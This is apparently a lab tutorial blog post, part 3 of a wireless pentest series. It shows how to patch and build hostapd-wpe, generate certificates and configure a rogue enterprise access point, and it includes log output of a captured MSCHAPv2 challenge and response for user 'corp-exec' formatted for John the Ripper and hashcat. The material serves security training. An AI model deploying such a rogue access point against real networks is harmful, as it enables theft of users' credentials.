Wireless pentest lab Part 3

By guest guestwireless, wireless pentest, Wireless Security basics

Part 1

Part 2

hostapd-wpe

apt-get install libssl-dev libnl-genl-3-dev libnl-3-dev pkg-config libsqlite3-dev build-essential wget --no-install-recommends

Download the files

wget https://raw.githubusercontent.com/aircrack-ng/aircrack-ng/master/patches/wpe/hostapd-wpe/hostapd-2.10-wpe.patch
wget https://w1.fi/releases/hostapd-2.10.tar.gz
tar -zxf hostapd-2.10.tar.gz
cd hostapd-2.10
patch -p1 < ../hostapd-2.10-wpe.patch
cd hostapd
make
make install
make wpe

Creating certs

cd /etc/hostapd-wpe/certs
./bootstrap
make install

Copy and edit the hostapd-wpe config file

nano wpeattackap.conf

# Configuration file for hostapd-wpe

# Interface - Probably wlan0 for 802.11, eth0 for wired

interface=wlan3

# May have to change these depending on build location
eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
ca_cert=/etc/hostapd-wpe/ca.pem
server_cert=/etc/hostapd-wpe/server.pem
private_key=/etc/hostapd-wpe/server.key
private_key_passwd=whatever
dh_file=/etc/hostapd-wpe/dh

# 802.11 Options
ssid=OnDeMaNd-11
channel=1

Execute the script

└─$ sudo ./hostapd-wpe ~/wirelesspentestlabs/wpeattackap.conf

[sudo] password for lab:
wlan3: interface state UNINITIALIZED->ENABLED
wlan3: AP-ENABLED
wlan3: INTERFACE-DISABLED
wlan3: INTERFACE-ENABLED

Verify that the SSID is available

Attempt to connect a client to the SSID

└─$ sudo ./hostapd-wpe ~/wirelesspentestlabs/wpeattackap.conf

wlan3: interface state UNINITIALIZED->ENABLED
wlan3: AP-ENABLED
wlan3: INTERFACE-DISABLED
wlan3: INTERFACE-ENABLED
wlan3: STA 66:dd:3d:13:e8:55 IEEE 802.11: associated
wlan3: CTRL-EVENT-EAP-STARTED 66:dd:3d:13:e8:55
wlan3: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
wlan3: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
wlan3: STA 66:dd:3d:13:e8:55 IEEE 802.1X: Identity received from STA: 'corp-exec'
wlan3: STA 66:dd:3d:13:e8:55 IEEE 802.1X: Identity received from STA: 'corp-exec'
wlan3: STA 66:dd:3d:13:e8:55 IEEE 802.1X: Identity received from STA: 'corp-exec'
wlan3: STA 66:dd:3d:13:e8:55 IEEE 802.1X: Identity received from STA: 'corp-exec'
wlan3: STA 66:dd:3d:13:e8:55 IEEE 802.1X: Identity received from STA: 'corp-exec'
wlan3: STA 66:dd:3d:13:e8:55 IEEE 802.1X: Identity received from STA: 'corp-exec'


mschapv2: Mon Apr  3 19:02:05 2023
         username:      corp-exec
         challenge:     a3:a3:e1:0b:2c:6a:23:48
         response:      eb:ac:bf:00:0c:8a:5b:16:53:4d:0f:e4:48:1f:4b:59:06:f5:69:4c:ae:6a:54:3b
         jtr NETNTLM:           corp-exec:$NETNTLM$a3a3e10b2c6a2348$ebacbf000c8a5b16534d0fe4481f4b5906f5694cae6a543b
         hashcat NETNTLM:       corp-exec::::ebacbf000c8a5b16534d0fe4481f4b5906f5694cae6a543b:a3a3e10b2c6a2348

wlan3: STA 66:dd:3d:13:e8:55 IEEE 802.1X: Identity received from STA: 'corp-exec'
wlan3: STA 66:dd:3d:13:e8:55 IEEE 802.11: disassociated

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.